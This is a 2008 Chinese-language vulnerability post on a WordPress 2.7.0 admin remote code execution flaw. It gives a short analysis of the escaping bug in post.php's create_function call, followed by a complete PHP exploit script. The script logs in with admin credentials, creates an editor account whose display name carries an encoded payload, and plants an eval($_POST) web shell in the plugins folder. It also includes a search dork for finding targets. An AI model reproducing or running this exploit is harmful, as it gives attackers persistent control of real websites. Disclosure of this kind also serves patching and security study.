WordPress 2.7.0 admin remote code execution vulnerability

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18

一分析:

这个漏洞出在后台:(

wp-admin/post.php

if ( current_user_can(‘edit_post’, $post_ID) ) {
if ( $last = wp_check_post_lock( $post->ID ) ) {
$last_user = get_userdata( $last );
$last_user_name = $last_user ? $last_user->display_name : __(‘Somebody’);
$message = sprintf( __( ‘Warning: %s is currently editing this post’ ), wp_specialchars( $last_user_name ) );
$message = str_replace( “‘”, “\'”, “<div class=’error’><p>$message</p></div>” );
//提交\’经过此处代码处理后变为\\’ :)
add_action(‘admin_notices’, create_function( ”, “echo ‘$message’;” ) );
//利用上面的方法闭合echo后面的单引号,就可以执行命令了[ex:\’;phpinfo();\’];另外这个地方也可以利用create_function函数自身的一个bug[1]来执行命令[ex:\’;}phpinfo();//]
} else {
wp_set_post_lock( $post->ID );
wp_enqueue_script(‘autosave’);
}
}

2.EXP:

#!/usr/bin/php
<?php

print_r(‘
+—————————————————————————+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: “powered by WordPress”
+—————————————————————————+
‘);
/**
* works regardless of php.ini settings
*/
if ($argc < 6) {
print_r(‘
+—————————————————————————+
Usage: php ‘.$argv[0].’ host path user pass post
host: target server (ip/hostname)
path: path to wordpress
user: admin login username
pass: admin login password
post: the available post id
Example:
php ‘.$argv[0].’ localhost /wp/ admin 123456 1
+—————————————————————————+
‘);
exit;
}

error_reporting(7);
ini_set(‘max_execution_time’, 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$post = $argv[5];

$shellcode = ‘\\\’;eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\”;
//$shellcode = ‘\\\’;}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//’;
$shell = ‘http://’.$host.$path.’wp-content/plugins/wolvez.php’;
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
$url = $path.’wp-login.php’;
$cmd = ‘log=’.urlencode($user).’&pwd=’.urlencode($pass);
$resp = send();
preg_match(‘/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/’, $resp, $admin_cookie);

if (!$admin_cookie)
exit(“Exploit Failed!\n”);

$url = $path.’wp-admin/user-new.php#add-new-user’;
$cmd = ”;
$resp = send($admin_cookie[1]);
preg_match(‘/name=”_wpnonce”\svalue=”([a-z0-9]{10})”/’, $resp, $_wpnonce);

if (!$_wpnonce)
exit(“Exploit Failed!\n”);

$cmd = ‘_wpnonce=’.$_wpnonce[1].’&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name=’.$shellcode;
$resp = send($admin_cookie[1]);

if (strpos($resp, ‘users.php?usersearch=ryat&update=add#user’) === false)
exit(“Exploit Failed!\n”);

$url = $path.’wp-login.php’;
$cmd = ‘log=ryat&pwd=123456’;
$resp = send();
preg_match(‘/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/’, $resp, $editor_cookie);

if (!$editor_cookie)
exit(“Exploit Failed!\n”);

$url = $path.’wp-admin/post.php?action=edit&post=’.$post;
$cmd = ”;
send($editor_cookie[1]);
send($admin_cookie[1]);

if (strpos(file_get_contents($shell), ‘puret_t’) !== false)
exit(“Expoilt Success!\nView Your shell:\t$shell\n”);
else
exit(“Exploit Failed!\n”);

function send($cookie = ”)
{
global $host, $path, $url, $cmd;

$data = “POST $url HTTP/1.1\r\n”;
$data .= “Accept: */*\r\n”;
$data .= “Accept-Language: zh-cn\r\n”;
$data .= “Referer: http://$host$path\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Length: “.strlen($cmd).”\r\n”;
$data .= “Connection: Close\r\n”;
$data .= “Cookie: $cookie\r\n\r\n”;
$data .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = ”;

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

相关日志

发表评论